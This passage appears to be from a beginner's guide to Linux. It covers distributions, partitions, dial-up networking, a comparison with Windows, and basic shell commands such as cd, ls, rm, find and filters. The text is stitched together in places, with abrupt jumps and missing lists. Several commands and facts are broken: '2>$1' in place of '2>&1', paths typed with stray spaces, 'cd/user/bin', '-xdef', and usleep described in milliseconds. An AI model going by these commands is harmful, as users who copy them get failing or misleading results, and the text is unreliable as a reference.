software. These are utilities that you can access using the text terminal, or the
interface that looks like a Windows command prompt where you enter
commands. Some of the GNU software that you will be using are the
command interpreter (also known as the bash shell) and the GNOME GUI.
If you are a developer, you will be able to make changes to the kernel or
create your own software for Linux using a C++ compiler (this already comes
with the GNU software that comes with your Linux distro) and the Gnu C.
You will also be using GNU software if you edit codes or textfiles using the
emacs or the ed editor.
Here are some of the most popular GNU software packages that you may
encounter as you explore Linux utilities:
3. Networks
Linux allows you to find everything that you need by using a network and
exchange information with another computer. Linux allows you to do this by
allowing you to use TCP/IP (Transmission Control Protocol/Internet
Protocol), which allows you to surf the web and communicate with any
server or computer out there.
4. Internet servers
Linux supports Internet services, such as the following:
Email
News services
File transfer utilities
World wide web
Remote login
Any Linux distro can offer these services, as long as there is Internet
connection, and that the computer is configured to have Internet servers, a
special server software that allows a Linux computer to send information to
another computer. Here are common servers that you will encounter in
Linux:
5. Software Development
Linux is a developer’s operating system, which means that it is an
environment that is fit for developing software. Right out of the box, this
operating system is rich with tools for software developments, such as
libraries of codes for program building and a compiler. If you have
background in the C language and Unix, Linux should feel like home to you.
Linux offers you the basic tools that you may have experienced using on a
Unix workstation, such as Sun Microsystems, HP (Hewlett-Packard), and
IBM.
6. Online documentation
After some time, you will want to look up more information about Linux
without having to pull up this book. Fortunately, Linux has enough
information published online that can help you in situations such as recalling
a syntax for a command. To pull this information up quickly, all you need to
do us to type in “man” in the command line to get the manual page for Linux
commands. You can also get help from your desktop and use either the help
option or icon.
Things to Consider When Choosing Distros
What is the best Linux distro (short for distribution) is for you? Here are
some things that you may want to keep in mind:
Package managers
One of the major factors that separate distros from one another is the package
manager that they come with. Just like what you may expect, there are distros
that come with features that allow them to be easier to use from the command
line while you are installing the features that come with them.
Another thing that you need to consider apart from the ease of use is the
package availability that comes with distros. For example, there are certain
distros that are not as popular as the others, which means that there are less
apps out there that are developed to be used with certain distributions. If you
are starting out on Linux, it may be a good idea to install a distro that does
not only promise easy navigation from the get-go, but also a wide range of
apps that you may want to install in the future.
Desktop environment
You will want to have a distro that allows you to enjoy a desktop that works
well with your computing needs – you will definitely want a desktop that has
great customization options, and easy to find windows and menus. You will
also want to ensure that your desktop have efficient resource usage, as well as
great integration with the apps that you plan to use.
While it is possible for you to place another desktop environment in the
future, you will still want the desktop that comes with your distro to resemble
the desktop that you really want to have. This way, you will not have to
spend too much effort trying to setup every app that you want to have quick
access to and ensure that all your applications are able to work well as they
run together.
Hardware Compatibility
Different distros contain different drivers in the installation package that they
come from, which means that there is a recommended set of hardware for
them to work seamlessly. Of course, you can check out other sources of
drivers that will work best with your existing hardware, but that only creates
more work when it comes to getting everything running right away from
installation. To prevent this trouble, check the distro’s compatibility page and
see whether all your computer peripherals work fine with your Linux
distribution out of the box.
Community Support
Linux is all about the community that continuously provides support to this
operating system, from documentation to troubleshooting. This means that
you are likely to get the resources that you need when it comes to managing a
particular distribution if it has a large community.
1. Ubuntu
Ubuntu is largely designed to make Linux easy to use for an average
computer user, which makes it a good distribution for every beginner. This
distro is simple, updates every six months, and has a Unity interface, which
allows you to use features such as a dock, a store-like interface for the
package manager, and a dashboard that allows you to easily find anything on
the OS. Moreover, it also comes with a standard set of applications that
works well with most users, such as a torrent downloader, a Firefox web
browser, and an app for instant messaging. You can also expect great support
from its large community.
2. Linux Mint
This distro is based on Ubuntu but is designed to make things even easier for
any user that has not used Linux in the past – it features familiar menus and is
not limited to just making you use open source programs. This means that
you can get programs that are standard in popular operating systems such as
.mp3 support and Adobe Flash, as well as a number of proprietary drivers.
3. Debian
If you want to be cautious and you want to see to it that you are running a
bug-free and stable computer at all times, then this is probably the distro for
you. Its main thrust is to make Linux a completely reliable system, but this
can have some drawbacks –Debian does not prioritize getting the latest
updates for applications that you have, which means that you may have to
manually search for the latest release of most software that you own. The
upside is that you can run Debian on numerous processor architectures, and it
is very likely to run on old builds.
However, this does not mean that going with Debian is having to remain
outdated – it has a lot of programs available online and in Linux repositories.
4. OpenSUSE
OpenSUSE is a great distro that you may consider trying out because it
allows you to configure your OS without having the need to deal with the
command line. It usually comes with the default desktop KDE, but will also
let you select between LXDE, KDE, XFCE, and GNOME as you install the
distro package. It also provides you good documentation, the YaST package
manager, and great support from the community.
One of the drawbacks that you may have when using this distro is that it can
consume a lot of resources, which means that it is not ideal to use on older
processor models and netbooks.
5. Arch Linux
Arch Linux is the distro for those that want to build their operating system
from scratch. All that you are going to get from the installation package from
the start is the command line, which you will use to get applications, desktop
environment, drivers, and so on. This means that you can aim to be as
minimal or as heavy in features, depending on what your needs are.
If you want to be completely aware of what is inside your operating system,
then Arch Linux is probably the best distro for you to start with. You will be
forced to deal with any possible errors that you may get, which can be a great
way to learn about operating Linux.
Another thing that makes this distro special is that it uses Pacman, which is
known to be a powerful package manager. Pacman comes in a rolling release,
which means that you are bound to install the latest version of every package
that is included – this ensures that you are bound to get cutting edge
applications and features for your Linux. Apart from this package manager,
you also get to enjoy the AUR (Arch User Repository), which allows you to
create installable version of available programs. This means that if you want
a program that is not available in Arch repositories, you can use the AUR
helper to install applications and other features like normal packages.
Chapter 4 Setting up a Linux System
As for the preparation of disk space, this is the most crucial moment in the
whole process of installing Linux. The fact is that if you install the system on
a computer whose hard disk already has any data, then it is here that you
should be careful not to accidentally lose it. If you install a Linux system on a
“clean” computer or at least on a new hard disk, where there is no data, then
everything is much simpler.
Why can’t you install Linux in the same partition where you already have, for
example, Windows, even with enough free space?
The fact is that Windows uses the FAT32 file system (in old versions –
FAT16) or NTFS (in Windows NT / 2000), and in Linux, a completely
different system called Extended File System 2 (ext2fs, in the newest
versions – journaling extSfs). These file systems can be located only on
different partitions of the hard disk.
Note that in Linux, physical hard disks are referred to as the first is hda, the
second is hdb, the third is hdc, and so on (hdd, hde, hdf...).
Sometimes in the installation program of the system you can see the full
names of the disks - / dev / hda instead of hda, / dev / hdb instead of hdb, and
so on – this is the same thing for us now. The logical partitions of each disk
are numbered. So, on a hda physical disk, there are hda1, hda2, and so on,
hdb can be hdb1, hdb2, and so on. Do not be confused by the fact that these
figures sometimes go in a row. It does not matter to us.
wireless network;
the local network;
A modem through which PPP is exchanged.
In the first case, a wireless access point is required. Only if available is it
possible to set up a wireless network with the Internet.
The second method is used when your computer is connected to a local
network, in which there is a server for access to the world wide web. In this
case, you do not need to put your efforts into the organization of the
connection – the local network administrator will do all that is necessary for
you. Just launch a browser, enter the URL you are interested in, and access it.
And the third way is a dial-up modem connection. In this case, the
administrator will not help you, so you have to do everything yourself. For
these reasons, we decided to consider this method in more detail.
First, naturally, you should have a modem and a telephone. Next, you need to
decide on the provider that provides access to the Internet and get from it the
phone number by which your PC will connect to the modem pool of the
provider and, of course, your username and password to access the global
network.
Next, you need to configure the PPP protocol. This can be done manually, or
you can use the configuration program. Manual configuration is quite
complicated and requires editing files and writing scripts. Therefore, it is
preferable for beginners to work with a special program that automates the
entire process of setting up access to the Internet.
This program is called kppp and is originally included in the KDE graphical
environment. This utility makes it much easier to set up a connection and, in
most cases, requires you to only correctly specify accounting information.
Chapter 5 Comparison between Linux and other
Operating Systems
Even though Linux operating system can co-exist easily with other operating
systems on the same machine, but there is still the difference between it and
other operating systems such as Windows OS/2, Windows 95/98, Windows
NT, and other implementations of UNІX for the personal computer. We can
compare and contrast the Linux and the other operating system with the
following points.
Linux is a Version of UNІX
Window NT and Windows OS/2 can be said to be a multitasking operating
system just like Linux. Looking technically at them, both Windows NT and
Windows OS/2 are very similar in features like in networking, having the
same user interface, security, etc. But there is not a version of UNІX like
Linux that is a version of UNІX. So, the difference here is that Linux is a
version of UNІX, and as such, enjoys the benefits from the contributions of
the UNІX community at large.
Full use of X86 PROCESSOR
It is a known fact that Windows, such as Windows 95/96, cannot fully utilize
the functionality of the X86 processor, but Linux operating system can
entirely run in this processor’s protected mode and explore all the features
therein which also includes the multiple processors.
Linux OS is free
Other operating systems are commercial operating systems, though Windows
is a little inexpensive. Some of the cost of this other operating system is high
for most personal computer users. Some retail operating systems cost as high
as $1000 or more compared to free Linux. The Linux software is free
because, when one can access the internet or another computer, a network can
be downloaded free to be installed. Another good option is that the Linux OS
can be copied from a friend system that already has the software.
Runs complete UNІX system
Unlike another operating system, one can run an entire UNІX system with
Linux at home without incurring the high cost of other UNIX
implementations for one’s computer. Again, some tools will enable Linux to
interact with Windows, so it becomes effortless to access Windows files from
Linux.
Linux OS still does much than Windows NT
Though more advanced operating systems are always on the rise in the world
of personal computers like the Microsoft Windows NT that is trending now,
because of its server, computing can’t benefit from the contributions of the
UNІX community, unlike the Linux OS. Again, Windows NT is a proprietary
system. The interface and design are owned and controlled by one
corporation which is Microsoft, so it is only that corporation or Microsoft that
may implement the design, so there might not a free version of it for a very
long time.
Linux OS is more stable
Linux and other operating systems such as Windows NT are battling for a fair
share of the server computing market. The Windows NT only has the full
support of the Microsoft marketing machine, but the Linux operating system
has the help of a community which comprised of thousands of developers
which are aiding the advancement of Linux through the open-source model.
So, looking at this comparison, it shows that each operating system has its
weak and robust point, but Linux is more outstanding than another operating
system because other operating systems can crash easily and very often
especially the Windows NT, while Linux machines are more stable and can
run continuously for an extended period.
Linux as better networking performance than others
Linux OS can be said to be notably better when it comes to networking
performance, though Linux might also be smaller than Windows NT. It has a
better price-performance ratio and can compete favorably with another
operating system because of its effective open-source development process.
Linux works better with other implementations of UNІX
Unlike the other operating system which can’t work with other
implementations of UNІX, this is not the same with Linux OS. UNІX
features and other implementations of UNІX for the personal computer are
similar to that of the Linux operating system. Linux is made to supports an
extensive range of hardware and other UNІX implementations because there
is more demand with Linux to support almost all kinds of graphics, a brand of
sound, board, SCSІ, etc. under the open-source model.
Booting and file naming
With Linux OS, there’s no limitation with booting. It can be booted right
from a logical partition or primary partition but with another operating
system like the Windows, there is the restriction of booting. It can only be
booted from the primary partition. Linux operating system file names are case
sensitive, but with others, like the Windows, it is case insensitive.
Linux operating system is customizable
Unlike another operating system, mostly with Windows, the Linux operating
system can be personalized. This is to say one or a user can modify the code
to suit any need, but it is not the same as others. One can even change Linux
OS's feel and looks.
Separating the directories
With Linux, OS directories are separated by using forward slash, but the
separation of Windows is done using a backslash. And again, Linux OS uses
the monolithic kernel which naturally takes more running space, unlike
another operating system that uses mіcrokеrnеl, which consumes lesser space
but, at the same time, its efficiency is a lot lower than when Linux is in use.
Chapter 6 Linux Command Lines
At this juncture, you should have a fair understanding of basic commands,
and Linux should be installed in your system. You now have an incredible
opportunity ahead of you – a completely blank slate where you can begin to
design an operating system. With Linux, you can easily customize your
operating system so that is does exactly what you would like for it to do. To
get started, you need to install a selection of reliable and functional
applications.
For ease of explanation, it is assumed that you are using Ubuntu. When you
are looking to install an application in Linux, the process is quite different
than what you would encounter in Windows. With Windows, you normally
need to download an installation package sourced at a website, and then you
can install the application.
With Linux, this process is not necessary as most of the applications are
stored in the distribution’s repositories. To find these applications, follow
these steps.
Go to System -> Administration -> Synaptic Package Manager
When you get to this point, you need to search for the package that you
require. In this example, the package shall be called comp. Next, you should
install the package using a command line as follows: -
sudo apt-get install comp
Linux also has another advantage over some popular operating systems. This
include the ability to install more than one package at a time, without having
to complete a process or more between windows. It all comes down to what
information is entered in the command lines. An example of this is as
follows: -
sudo apt-get install comp beta-browser
There are even more advantages (other than convenience) to being able to
install multiple packages. In Linux, these advantages include updating.
Rather than updating each application, one at a time, Linux allows for all the
applications to be updated simultaneously through the update manager.
The Linux repository is diverse, and a proper search through it will help you
to identify a large variety of apps that you will find useful. Should there be an
application that you need which is not available in the repository, Linux will
give you instructions on how you can add separate repositories.
The Command Line
Using Linux allows you to customize your system to fit your needs. For those
who are not tech savvy, the distributions settings are a good place to change
things until you get what you want. However, you could spend hours fiddling
with the available settings and still fail to find setting that is perfect for you.
Luckily, Linux has a solution and that comes in the form of the command
line. Even though the command line sounds complex, like something that can
only be understood by a tech genius, it is quite simple to discern.
The beauty of adjusting things in your operating system using the command
line, so that the sky is the limit and creativity can abound.
To begin, you need to use “The Shell”. This is basically a program which can
take in commands from your keyboard and ensure that the operating systems
performs these commands. You will also need to start a “Terminal”. A
terminal is also a program and it allows you to interact with the shell.
To be a terminal, you should select the terminal option from the menu. In this
way, you can gain access to a shell session. In this way you can begin
practicing your command prompts.
In your shell session, you should see a shell prompt. Within this shell prompt
you will be see your username and the name of the machine that you are
using, followed by a dollar sign. It will appear as follows: -
[name@mylinux me] $
If you try to type something under this shell prompt, you will see a message
from bash. For example,
[name@mylinux me] $
lmnopqrst
bash: lmnopqrst
command not found
This is an error message where the system lets you know that it is unable to
comprehend the information you put in. If you press the up-arrow key, you
will find that you can go back to your previous command, the lmnopqrst one.
If you press the down arrow key, you will find yourself on a blank line.
This is important to note because you can then see how you end up with a
command history. A command history will make it easier for you to retrace
your steps and make corrections as you learn how to use the command
prompt.
Command Lines for System Information
The most basic and perhaps most useful command lines are those that will
help you with system information. To start, you can try the following: -
Command for Date
This is a command that will help you to display the date.
root@compsis: -# date
Thursday May 21 12.31.29 IST 2o15
Command for Calendar
This command will help display the calendar of the current month, or any
other month that may be coming up.
root@compsis: -# cal
Command for uname
This command is for Unix Name, and it will provide detailed information
about the name of the machine, its operating system and the Kernel.
Navigating Linux Using Command Lines
You can use the command lines in the same way that you would use a mouse,
to easily navigate through your Linux operating system so that you can
complete the tasks you require. In this section, you will be introduced to the
most commonly used commands.
Finding files in Linux is simple, as just as they are arranged in order in
familiar Windows programmes, they also follow a hierarchical directory
structure. This structure resembles what you would find with a list of folders
and is referred to as directories.
The primary directory within a file system is referred to as a root directory. In
it, you will be able to source files, and subdirectories which could contain
additional sorted files. All files are stored under a single tree, even if there are
several storage devices.
pwd
pwd stands for print working directory. These will help you to choose a
directory where you can store all your files. Command lines do not give any
graphical representation of a filing structure. However, when using a
command line interface, you can view all the files within a parent directory,
and all the pathways that may exist in a subdirectory.
This is where the pwd comes in. Anytime that you are simply standing in a
directory, you are in a working directory. The moment you log onto your
Linux operating system, you will arrive in your home directory (which will
be your working directory while you are in it). In this directory, you can find
all your files. To identify the name of the directory that you are in, you
should use the following pwd command.
[name@mylinux me] $pwd
/home/me
You can then begin exploring within the directory by using the ls command.
ls stands for list files in the directory. Therefore, to view all the files that are
in your working directory, type in the following command and you will see
results as illustrated below.
[name@mylinux me] $ls
Desktop bin linuxcmd
GNUstep ndeit.rpm nsmail
cd
cd stands for change directory. This is the command that you need to use
when you want to switch from your working directory and view other files.
To use this command, yu need to know the pathname for the working
directory that you want to view. There are two different types of pathnames
for you to discern. There is the absolute pathname and the relative pathname.
The absolute pathname is one that starts at your root directory, and by
following a file path, it will easily lead you to your desired directory.
Suppose your absolute pathname for a directory is /usr/bin. The directory is
known as usr and there is another directory within it using the name bin. If
you want to use the cd command to access your absolute pathname, you
should type in the following command: -
[name@mylinux me] $cd/user/bin
[name@mylinux me] $pwd
/usr/bin [name@mylinux me] $ls
When you enter this information, you would have succeeded in changing
your working directory to /usr/bin.
You can use a relative pathname when you want to change the new working
directory which is /usr/bin to the parent directory, which would be /usr. To
execute this, you should type in the following prompt: -
[name@mylinux me] $cd ..
[name@mylinux me] $pwd
/usr
Using a relative pathway cuts down on the amount of typing that you must do
when using command lines, therefore, it is recommended that you learn as
many of these as possible.
When you want to access a file using Linux command prompts, you should
take note that they are case sensitive. Unlike other files which you would find
on Windows Operating Systems and programs, the files in Linux do not have
file extensions. This is great because it gives you the flexibility of labeling
the files anything that you like. One thing you need to be careful of are the
application programs that you use. There are some that may automatically
create extensions on files, and it is these that you need to be careful and
watch out for.
Chapter 7 Introduction to Linux Shell
Shells
! command number
If you enter !!, the last command typed starts.
Sometimes on Linux, the names of programs and commands are too long.
Fortunately, bash itself can complete the names. By pressing the Tab key,
you can complete the name of a command, program, or directory. For
example, suppose you want to use the bunzip2 decompression program. To
do this, type:
bu
Then press Tab. If nothing happens, then there are several possible options
for completing the command. Pressing the Tab key again will give you a list
of names starting with bu. For example, the system has buildhash, builtin,
bunzip2 programs:
$ bu
buildhash builtin bunzip2
$ bu
Type n> (bunzip is the only name whose third letter is n), and then press Tab.
The shell will complete the name and it remains only to press Enter to run the
command!
Note that the program invoked from the command line is searched by bash in
directories defined in the PATH system variable. By default, this directory
listing does not include the current directory, indicated by ./ (dot slash).
Therefore, to run the prog program from the current directory, you must issue
the command ./prog.
Basic commands
The first tasks that have to be solved in any system are: working with data
(usually stored in files) and managing programs (processes) running on the
system. Below are the commands that allow you to perform the most
important operations on working with files and processes. Only the first of
these, cd, is part of the actual shell, the rest are distributed separately, but are
always available on any Linux system. All the commands below can be run
both in the text console and in graphical mode (xterm, KDE console). For
more information on each command, use the man command, for example:
man ls
cd
Allows you to change the current directory (navigate through the file system).
It works with both absolute and relative paths. Suppose you are in your home
directory and want to go to its tmp / subdirectory. To do this, enter the
relative path:
cd tmp /
To change to the / usr / bin directory, type (absolute path):
cd / usr / bin /
Some options for using the command are:
cd ..
Allows you to make the current parent directory (note the space between cd
and ..).
cd -
Allows you to return to the previous directory. The cd command with no
parameters returns the shell to the home directory.
ls
ls (list) lists the files in the current directory. Two main options: -a - view all
files, including hidden, -l - display more detailed information.
rm
This command is used to delete files. Warning: deleting the file, you cannot
restore it! Syntax: rm filename.
This program has several parameters. The most frequently used ones are: -i -
file deletion request, -r - recursive deletion (i.e. deletion, including
subdirectories and hidden files). Example:
rm -i ~ / html / *. html
Removes all .html files in your html directory.
mkdir, rmdir
The mkdir command allows you to create a directory, while rmdir deletes a
directory, provided it is empty. Syntax:
mkdir dir_name
rmdir dir_name
The rmdir command is often replaced by the rm -rf command, which allows
you to delete directories, even if they are not empty.
less
less allows you to page by page. Syntax:
less filename
It is useful to review a file before editing it; The main use of this command is
the final link in a chain of programs that outputs a significant amount of text
that does not fit on one screen and otherwise flashes too quickly. To exit less,
press q (quit).
grep
This command allows you to find a string of characters in the file. Please note
that grep searches by a regular expression, that is, it provides the ability to
specify a template for searching a whole class of words at once. In the
language of regular expressions, it is possible to make patterns describing, for
example, the following classes of strings: “four digits in a row, surrounded by
spaces”. Obviously, such an expression can be used to search in the text of all
the years written in numbers. The search capabilities for regular expressions
are very wide. For more information, you can refer to the on-screen
documentation on grep (man grep). Syntax:
grep search_file
ps
Here we consider utilities that work with file system objects: files,
directories, devices, as well as file systems in general.
cp
Copies files and directories.
mv
Moves (renames) files.
rm
Removes files and directories.
df
Displays a report on the use of disk space (free space on all disks).
du
Calculates disk space occupied by files or directories.
ln
Creates links to files.
ls
Lists files in a directory, supports several different output formats.
mkdir
Creates directories.
touch
Changes file timestamps (last modified, last accessed), can be used to create
empty files.
realpath
Calculates absolute file name by relative.
basename
Removes the path from the full file name (i.e., shortens the absolute file name
to relative).
dirname
Removes the file name from the full file name (that is, it displays the full
name of the directory where the file is located).
pwd
Displays the name of the current directory.
Filters
Filters are programs that read data from standard input, convert it and output
it to standard output. Using filtering software allows you to organize a
pipeline: to perform several sequential operations on data in a single
command. More information about standard I / O redirection and the pipeline
can be found in the documentation for bash or another command shell. Many
of the commands listed in this section can work with files.
cat
combines files and displays them to standard output;
tac
combines files and displays them on standard output, starting from the end;
sort
sorts rows;
uniq
removes duplicate lines from sorted files;
tr
performs the replacement of certain characters in the standard input for other
specific characters in the standard output, can be used for transliteration,
deletion of extra characters and for more complex substitutions;
cut
systematized data in text format can be processed using the cut utility, which
displays the specified part of each line of the file; cut allows you to display
only the specified fields (data from some columns of the table in which the
contents of the cells are separated by a standard character — a tabulation
character or any other), as well as characters standing in a certain place in a
line;
paste
combines data from several files into one table, in which the data from each
source file make up a separate column;
csplit
divides the file into parts according to the template;
expand
converts tabs to spaces;
unexpand
converts spaces to tabs;
fmt
formats the text in width;
fold
transfers too long text lines to the next line;
nl
numbers file lines;
od
displays the file in octal, hexadecimal and other similar forms;
tee
duplicates the standard output of the program in a file on disk;
Other commands
head
displays the initial part of the file of the specified size;
tail
outputs the final part of a file of a given size, since it can output data as it is
added to the end of the file, used to track log files, etc.;
echo
displays the text of the argument on the standard output;
false
does nothing, comes out with a return code of 1 (error), can be used in shell
scripts if an unsuccessful command is being attempted;
true
does nothing, comes out with a return code of 0 (successful completion), can
be used in scripts if a successful command is required;
yes
infinitely prints the same line (by default, yes) until it is interrupted.
seq
displays a series of numbers in a given range of successively increasing or
decreasing by a specified amount;
sleep
suspends execution for a specified number of seconds;
usleep
suspends execution for a specified number of milliseconds;
comm
compares 2 pre-sorted (by the sort command) files line by line, displays a
table of three columns, where in the first are lines unique to the first file, in
the second are unique to the second, in the third they are common to both
files;
join
combines lines of two files on a common field;
paste
For each pair of input lines with the same common fields, print the line to
standard output. By default, the general field is considered first, the fields are
separated by whitespace.
split
splits the file into pieces of a given size.
Calculations
In addition to simple operations with strings (input/output and merging), it is
often necessary to perform some calculations on the available data. Listed
below are utilities that perform calculations on numbers, dates, strings.
test
returns true or false depending on the value of the arguments; The test
command is useful in scripts to check conditions;
date
displays and sets the system date, in addition, it can be used for calculations
over dates;
expr
evaluates expressions;
md5sum
calculates checksum using MD5 algorithm;
sha1sum
calculates checksum using SHA1 algorithm;
wc
counts the number of lines, words, and characters in the file;
factor
decomposes numbers into prime factors;
Search
The search for information in the file system can be divided into a search by
file attributes (understanding them extensively, that is, including the name,
path, etc.) and content search. For these types of search, the programs find
and grep are usually used, respectively. Thanks to convenient interprocess
communication tools, these two types of search are easy to combine, that is,
to search for the necessary information only in files with the necessary
attributes.
Attribute search
The main search tool for file attributes is the find program. A generalized call
to find looks like this: find path expression, where path is a list of directories
in which to search, and expression is a set of expressions that describe the
criteria for selecting files and the actions to be performed on the files found.
By default, the names of found files are simply output to standard output, but
this can be overridden and the list of names of found files can be transferred
to any command for processing. By default, find searches in all subdirectories
of directories specified in the path list.
Expressions
Expressions that define file search criteria consist of key-value pairs. Some of
the possible search options are listed below:
-amin, -anewer, -atime
The time of the last access to the file. Allows you to search for files that were
opened for a certain period of time, or vice versa, for files that nobody has
accessed for a certain period.
-cmin, -cnewer, -ctime
The time the file was last changed.
-fstype
The type of file system on which the file is located.
-gid, -group
User and group that owns the file.
-name, -iname
Match the file name to the specified pattern.
-regex, -iregex
Match the file name to a regular expression.
-path, -ipath
Match the full file name (with the path) to the specified pattern.
-perm
Access rights.
-size
File size.
-type
File type.
Actions
The find program can perform various actions on the found files. The most
important of them are:
-print
Output the file name to the standard output (the default action);
-delete
delete a file;
-exec
execute the command by passing the file name as a parameter.
You can read about the rest in the on-screen documentation for the find
command, by issuing the man find command.
Options
Parameters affect the overall behavior of find. The most important of them
are:
-maxdepth
maximum search depth in subdirectories;
-mindepth
minimum search depth in subdirectories;
-xdef
Search only within the same file system.
You can read about the rest in the on-screen documentation for the find
command.
Terminals
The terminal in Linux is a program that provides the user with the ability to
communicate with the system using the command line interface. Terminals
allow you to transfer to the system and receive only text data from it. The
standard terminal for the Linux system can be obtained on any textual virtual
console, and in order to access the command line from the graphical shell,
special programs are needed: terminal emulators. Listed below are some of
the terminal emulators and similar programs included in the ALT Linux 2.4
Master distribution.
xterm
Programs: resize, uxterm, xterm.
Standard terminal emulator for the X Window System. This emulator is
compatible with DEC VT102 / VT220 and Tektronix 4014 terminals and is
designed for programs that do not use the graphical environment directly. If
the operating system supports changing the terminal window (for example, a
SIGWINCH signal on systems that have gone from 4.3bsd), xterm can be
used to inform programs running on it that the window size has changed.
aterm
Aterm is a color emulator of the terminal rxvt version 2.4.8, supplemented
with NeXT-style scroll bars by Alfredo Kojima. It is intended to replace the
xterm if you do not need a Tektronix 4014 terminal emulation.
console-tools
Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt,
dumpkeys, fgconsole, "" setkeycodes, setleds, setmetamode, setvesablank,
showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt.
This package contains tools for loading console fonts and keyboard layouts.
It also includes a variety of fonts and layouts.
In case it is installed, its tools are used during boot / login to establish the
system / personal configuration of the console.
screen
The screen utility allows you to execute console programs when you cannot
control their execution all the time (for example, if you are limited to session
access to a remote machine).
For example, you can perform multiple interactive tasks on a single physical
terminal (remote access session) by switching between virtual terminals using
a screen installed on a remote machine. Or this program can be used to run
programs that do not require direct connection to the physical terminal.
Install the screen package if you may need virtual terminals.
vlock
The vlock program allows you to block input when working in the console.
Vlock can block the current terminal (local or remote) or the entire system of
virtual consoles, which allows you to completely block access to all consoles.
Unlocking occurs only after successful authorization of the user who initiated
the console lock.
Chapter 8 Basic Linux Shell Commands
Introduction
We are not going to look at some useful commands for file handling and
similar uses. Before going into more details, let’s look at the Linux file
structure.
Linux stores files in a structure known as the virtual directory structure.
This is a single directory structure. It incorporates all the storage devices
into a single tree. Each storage device is considered as a file. If you
examine the path of a file, you do not see the disk information. For
instance, the path to my desktop is, /home/jan/Desktop. This does not
display any disk information in its path. By this way, you do not need to
know the underlying architecture.
If you are to add another disk to the existing, you simply use mount point
directories to do so. Everything is connected to the root.
These files naming is based on the FHS (Filesystem Hierarchy Standard).
Let’s look at the common files once more. We already went through the
directory types during the installation.
Table: Linux directory types
Directory Purpose
/ This is the root home directory. The upper-most level.
/bin This is the binary store. GNU utilities (user-level) exist in this
directory.
/boot This is where the system stores the boot directory and files
used during the boot process.
/dev Device directory and nodes.
/etc This is where the system stores the configuration files.
/home Home of user directories.
/lib System and application libraries.
/media This is where media is mounted, media such as CDs, USB
drives.
/mnt Where the removable media is mounted to.
/opt Optional software packages are stored here.
/proc Process information – not open for users.
/root Home directory of root.
/run Runtime data is stored here.
/sbin System binary store. Administrative utilities are stored here.
/srv Local services store their files here.
/sys System hardware information is stored here.
/tmp This is the place for temporary files.
/usr This is where the user-installed software are stored.
/var Variable director where the dynamic files such as logs are
stored.
Change the directory location using the cd command. Here we use the
absolute path.
Here, the dir command lists directories under my current folder. I could
jump to desktop folder using the command cd Desktop.
There are 2 special characters when it comes to directory traversal. Those are
‘.’ And ‘..’. Single dot represents the current directory. Double dots represent
the upper folder.
6. You can also use ‘..’ to skip typing folder paths. For instance,
7. You can go back one level and go forward. Here, you go up to
the home folder and then go forward (down) to the Music
folder.
Listing Files
We use ls command to list files. This is one of the most popular
commands among Linux users. Below is a list of ls commands and their
use.
ls- a List all files including all the
hidden files starting with ‘.’
ls --color Colored list [=always/never/auto]
ls -d List the directories with ‘*/’
ls -F Append indicator to entries (such as
one of */=>@|)
ls -i Lists the inode index
ls -l List with long format including
permissions
ls- la Same as above with hidden files
ls -lh The long list with human readable
format
ls -ls The long list with file size
ls -r Long list in reverse
ls -R List recursively (the directory tree)
ls -s List file size
ls -S List by size
ls -t Sort by date/time
ls -X Sort by extension name
Let’s examine a few commands. Remember, you can use more than one
argument. E.g., ls -la
Syntax: ls [option ...] [file]...
Detailed syntax:
ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape]
[--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]]
[-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type]
[--format=word] [--full-time] [-g] [--group-directories-first]
[-G | --no-group] [-h | --human-readable] [--si]
[-H | --dereference-command-line] [--dereference-command-line-symlink-
to-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode]
[-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference]
[-m] [-n | --numeric-uid-gid] [-N | --literal] [-o]
[-p | --indicator-style=slash] [-q | --hide-control-chars]
[--show-control-chars] [-Q | --quote-name] [--quoting-style=word]
[-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word]
[--time=word] [--time-style=style] [-t] [-T | --tabsize=cols]
[-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1]
Example: ls -l setup.py
This gives long list style details for this specific file.
More examples
List content of your home directory: ls
Lists content of your parent directory: ls */
Displays directories of the current directory: ls -d */
Lists the content of root: ls /
Lists the files with the following extensions: ls *.{htm,sh,py}
Lists the details of a file. If not found suppress the errors: ls -myfile.txt
2>/dev/null
A word on /dev/null
/dev/null is an important location. This is actually a special file called the
null device. There are other names, such as blackhole or bit-bucket.
When something is written to this file, it immediately discards it and
returns and end-of-file (EOF).
When a process or a command returns an error STDERR or the standard error
is the default file descriptor a process can write into. These errors will be
displayed on screen. If someone wants to suppress it, that is where the null
device becomes handy.
We often write this command line as /dev/null 2>&1. For instance,
ls- 0 > /dev/null 2>$1
What does it mean by 2 and $1. The file descriptors for Standard Input (stdin)
is 0. For Standard Output (stdout), it is 1. For Standard Error (stderr) it is 2.
Here, we are suppressing the error generated by the ls command. It is
redirected to stdout and then writing it to the /dev/null thus discarding it
immediately.
ls Color Codes
ls color codes
These color codes distinguish the file types quite well
Let’s run ls -lasSt
This uses a long list format, displays all files, sorts by time. Now, you need to
understand what these values are.
1. 4: File size (sorted by size).
2. In the next section d is for directory.
3. The next few characters represent permissions (r-read, w-write,
x-execute).
4. Number of hard links.
5. File owner.
6. File owner’s group.
7. Byte size.
8. Last modified time (sort by).
9. File/Directory name.
If you use -i in the command (S is removed, sorted by last modified time).
You see the nodes in the left most area.
Example: ls -laxo
Here, to view the output you use –time parameter in the ls command. With
only the ls -l it does not display the last access time but the last modified
time.
Copying Files
To copy files, use the cp command.
Syntax: cp [option]... [-T] source destination
Example: cp test1.txt test2.txt
Copy a file to the present working directory using the relative path. Here we
will use ‘.’ to denote the pwd.
Recursively copy files and folders
Example: cp -R copies the folder snapt with files to snipt.
Let’s copy a set of files recursively from one directory to its sub directory.
Command: cp -R ./Y/snapt/test* ./Y/snopt
If you check the inode you will see these are different files. The size can tell
the same difference.
- 279185 test1.txt
- 1201056 testn.txt
When you create symlinks, the destination file should not be there (especially
directory with the destination symlink name should not be there). However,
you can force the command to create or replace the file.
If you wish to overwrite symlinks, you have to use the -f as stated above.
Or else, if you want to replace the symlink from a file to another, use -n.
Example: I have 2 directories dir1 and dir2 on my desktop. I create a
